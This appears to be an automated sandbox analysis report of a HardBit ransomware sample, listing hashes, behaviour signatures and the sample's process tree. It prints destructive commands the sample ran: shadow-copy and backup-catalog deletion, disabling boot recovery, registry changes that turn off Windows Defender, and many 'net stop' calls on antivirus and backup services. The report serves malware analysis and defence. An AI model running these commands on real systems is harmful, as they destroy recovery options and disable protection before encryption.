Resubmissions
28-02-2023 20:04
230228-ytdzksch89 1004-02-2023 22:36
230204-2jls8aeh82 1004-02-2023 22:32
230204-2gdptseh74 1004-02-2023 22:30
230204-2es2qseh68 1004-02-2023 22:15
230204-16lw3aab7v 1028-12-2022 14:55
221228-saetwadg2x 10Analysis
-
max time kernel
107s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
04-02-2023 22:30
Static task
static1
Behavioral task
behavioral1
Sample
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Resource
win10v2004-20220812-en
General
-
Target
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
-
Size
333KB
-
MD5
3191feae778309eb99df4e4e25c62f1a
-
SHA1
d639821e3fbbb15e14b46aed5b98568e3ce045c3
-
SHA256
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992
-
SHA512
c8d8734bb1d6e413d8b14e73952a4eb42fd5641ca49822db66f87ea7f0c1fb4c2a38232a652a11ca1c3c5564a517a2aaef8fb59fadff36a11afcce60e5d89798
-
SSDEEP
6144:P1S1JwNbEKcwwZTz2fYNR5OyxyM6qy9iJ4zv5fmRw9aC1oPtYdeAS9aqbGqeBD:9So4KcZbRwyxmf9iWhuw9aCqPtYMH9zs
Malware Config
Extracted
C:\Users\Admin\Favorites\Links\How To Restore Your Files.txt
Extracted
C:\Users\Admin\AppData\Local\Temp\readme-warning.hta
https://tox.chat/
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation lsm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Executes dropped EXE 1 IoCs
pid Process 5416 lsm.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Documents\\hrdb.ico" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HARDBIT.jpg" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4572 sc.exe 10192 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\DefaultIcon a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\DefaultIcon\ = "C:\\Users\\Admin\\Documents\\hrdb.ico" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.hardbit2\ a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Runs net.exe
-
Runs regedit.exe 1 IoCs
pid Process 3936 regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4636 powershell.exe 4636 powershell.exe 4636 powershell.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3936 regedit.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 5040 WMIC.exe Token: SeSecurityPrivilege 5040 WMIC.exe Token: SeTakeOwnershipPrivilege 5040 WMIC.exe Token: SeLoadDriverPrivilege 5040 WMIC.exe Token: SeSystemProfilePrivilege 5040 WMIC.exe Token: SeSystemtimePrivilege 5040 WMIC.exe Token: SeProfSingleProcessPrivilege 5040 WMIC.exe Token: SeIncBasePriorityPrivilege 5040 WMIC.exe Token: SeCreatePagefilePrivilege 5040 WMIC.exe Token: SeBackupPrivilege 5040 WMIC.exe Token: SeRestorePrivilege 5040 WMIC.exe Token: SeShutdownPrivilege 5040 WMIC.exe Token: SeDebugPrivilege 5040 WMIC.exe Token: SeSystemEnvironmentPrivilege 5040 WMIC.exe Token: SeRemoteShutdownPrivilege 5040 WMIC.exe Token: SeUndockPrivilege 5040 WMIC.exe Token: SeManageVolumePrivilege 5040 WMIC.exe Token: 33 5040 WMIC.exe Token: 34 5040 WMIC.exe Token: 35 5040 WMIC.exe Token: 36 5040 WMIC.exe Token: SeIncreaseQuotaPrivilege 5040 WMIC.exe Token: SeSecurityPrivilege 5040 WMIC.exe Token: SeTakeOwnershipPrivilege 5040 WMIC.exe Token: SeLoadDriverPrivilege 5040 WMIC.exe Token: SeSystemProfilePrivilege 5040 WMIC.exe Token: SeSystemtimePrivilege 5040 WMIC.exe Token: SeProfSingleProcessPrivilege 5040 WMIC.exe Token: SeIncBasePriorityPrivilege 5040 WMIC.exe Token: SeCreatePagefilePrivilege 5040 WMIC.exe Token: SeBackupPrivilege 5040 WMIC.exe Token: SeRestorePrivilege 5040 WMIC.exe Token: SeShutdownPrivilege 5040 WMIC.exe Token: SeDebugPrivilege 5040 WMIC.exe Token: SeSystemEnvironmentPrivilege 5040 WMIC.exe Token: SeRemoteShutdownPrivilege 5040 WMIC.exe Token: SeUndockPrivilege 5040 WMIC.exe Token: SeManageVolumePrivilege 5040 WMIC.exe Token: 33 5040 WMIC.exe Token: 34 5040 WMIC.exe Token: 35 5040 WMIC.exe Token: 36 5040 WMIC.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeDebugPrivilege 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Token: SeIncreaseQuotaPrivilege 4152 WMIC.exe Token: SeSecurityPrivilege 4152 WMIC.exe Token: SeTakeOwnershipPrivilege 4152 WMIC.exe Token: SeLoadDriverPrivilege 4152 WMIC.exe Token: SeSystemProfilePrivilege 4152 WMIC.exe Token: SeSystemtimePrivilege 4152 WMIC.exe Token: SeProfSingleProcessPrivilege 4152 WMIC.exe Token: SeIncBasePriorityPrivilege 4152 WMIC.exe Token: SeCreatePagefilePrivilege 4152 WMIC.exe Token: SeBackupPrivilege 4152 WMIC.exe Token: SeRestorePrivilege 4152 WMIC.exe Token: SeShutdownPrivilege 4152 WMIC.exe Token: SeDebugPrivilege 4152 WMIC.exe Token: SeSystemEnvironmentPrivilege 4152 WMIC.exe Token: SeRemoteShutdownPrivilege 4152 WMIC.exe Token: SeUndockPrivilege 4152 WMIC.exe Token: SeManageVolumePrivilege 4152 WMIC.exe Token: 33 4152 WMIC.exe Token: 34 4152 WMIC.exe Token: 35 4152 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3936 regedit.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5104 wrote to memory of 2156 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 90 PID 5104 wrote to memory of 2156 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 90 PID 5104 wrote to memory of 2156 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 90 PID 2156 wrote to memory of 4572 2156 cmd.exe 92 PID 2156 wrote to memory of 4572 2156 cmd.exe 92 PID 2156 wrote to memory of 4572 2156 cmd.exe 92 PID 5104 wrote to memory of 1304 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 93 PID 5104 wrote to memory of 1304 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 93 PID 5104 wrote to memory of 1304 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 93 PID 5104 wrote to memory of 2148 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 95 PID 5104 wrote to memory of 2148 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 95 PID 5104 wrote to memory of 2148 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 95 PID 2148 wrote to memory of 5040 2148 cmd.exe 97 PID 2148 wrote to memory of 5040 2148 cmd.exe 97 PID 2148 wrote to memory of 5040 2148 cmd.exe 97 PID 5104 wrote to memory of 4948 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 101 PID 5104 wrote to memory of 4948 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 101 PID 5104 wrote to memory of 4948 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 101 PID 5104 wrote to memory of 4636 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 104 PID 5104 wrote to memory of 4636 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 104 PID 5104 wrote to memory of 4636 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 104 PID 5104 wrote to memory of 4284 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 137 PID 5104 wrote to memory of 4284 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 137 PID 5104 wrote to memory of 4284 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 137 PID 5104 wrote to memory of 4300 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 105 PID 5104 wrote to memory of 4300 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 105 PID 5104 wrote to memory of 4300 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 105 PID 5104 wrote to memory of 528 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 136 PID 5104 wrote to memory of 528 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 136 PID 5104 wrote to memory of 528 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 136 PID 5104 wrote to memory of 4732 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 107 PID 5104 wrote to memory of 4732 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 107 PID 5104 wrote to memory of 4732 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 107 PID 5104 wrote to memory of 1388 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 108 PID 5104 wrote to memory of 1388 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 108 PID 5104 wrote to memory of 1388 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 108 PID 5104 wrote to memory of 2440 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 109 PID 5104 wrote to memory of 2440 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 109 PID 5104 wrote to memory of 2440 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 109 PID 5104 wrote to memory of 1376 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 110 PID 5104 wrote to memory of 1376 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 110 PID 5104 wrote to memory of 1376 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 110 PID 5104 wrote to memory of 916 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 111 PID 5104 wrote to memory of 916 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 111 PID 5104 wrote to memory of 916 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 111 PID 5104 wrote to memory of 4016 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 112 PID 5104 wrote to memory of 4016 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 112 PID 5104 wrote to memory of 4016 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 112 PID 5104 wrote to memory of 452 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 113 PID 5104 wrote to memory of 452 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 113 PID 5104 wrote to memory of 452 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 113 PID 5104 wrote to memory of 5000 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 114 PID 5104 wrote to memory of 5000 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 114 PID 5104 wrote to memory of 5000 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 114 PID 5104 wrote to memory of 1272 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 127 PID 5104 wrote to memory of 1272 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 127 PID 5104 wrote to memory of 1272 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 127 PID 4284 wrote to memory of 1492 4284 net.exe 126 PID 4284 wrote to memory of 1492 4284 net.exe 126 PID 4284 wrote to memory of 1492 4284 net.exe 126 PID 5104 wrote to memory of 4520 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 116 PID 5104 wrote to memory of 4520 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 116 PID 5104 wrote to memory of 4520 5104 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 116 PID 4300 wrote to memory of 1832 4300 net.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe"C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Windows security modification
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C sc delete VSS2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\sc.exesc delete VSS3⤵
- Launches sc.exe
PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no2⤵PID:4948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:848
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:1388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:2440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:4348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:4840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y4⤵PID:9156
-
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" top SavRoam /y2⤵PID:4016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 top SavRoam /y3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5220
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:5000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5196
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:5448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:3732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5460
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:3928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5428
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:1272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:5364
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:528
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4284
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:4532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:5660
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:3792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5736
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:4932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5928
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:6000
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:5396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:6108
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:5472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5516
-
